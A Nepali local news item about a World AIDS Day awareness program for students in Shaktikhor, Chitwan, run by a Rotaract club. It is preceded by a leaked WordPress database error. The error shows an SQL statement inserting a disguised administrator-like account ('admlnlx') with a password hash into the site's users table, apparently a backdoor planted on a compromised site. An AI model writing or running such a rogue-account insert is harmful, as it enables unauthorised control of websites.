WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$By0E/oTjKmyearZvEueCaIZen6S/l1/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 18:08:09', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर १६–
आज विश्व एआईभी/एड्स दिवस । चितवनसहित देशभर विविध कार्यक्रम गरि मनाईएको छ ।
दिवसकै अवसर पारेर आज रोटर्याक्ट क्लव अफ रत्ननगरले पहाडी गाविस शक्तिखोरमा जनचेतना मुलक कार्यक्रम गरेको छ । शक्तिखोरस्थित चर्तुमुखी उच्च मावि विद्यालयमा विद्यार्थीहरुलाई एचआईभी/एड्सको बारेमा जानकारी दिईएको हो । विद्यालय स्तरबाटै यस रोगबारे चेतना फैलाउन सके अबको पुस्तामा यो रोगको समस्या भोग्न नपर्ने भन्दै विद्यालय स्तरलाई प्राथमिकता राखेर कार्यक्रम गरिएको रोटर्याक्ट रत्ननगरका इलेक्टेड प्रेसिडेन्ट विनोद खतिवडाले जानकारी दिनुभयो । कार्यक्रममा ओएसिस मेडिकल कलेजका चिकित्सक शिशिर देवकोटा र कपिल खनालले एआईभी/एड्स बारे जानकारी गराएका थिए ।
कार्यक्रममा विद्यालयका प्रधानाध्यापक चन्द्र गुरुङ, रोटर्याक्ट क्लव अफ भरतपुरका अध्यक्ष भानुभक्त खरेललगायतले मन्तव्य व्यक्त गरेका थिए ।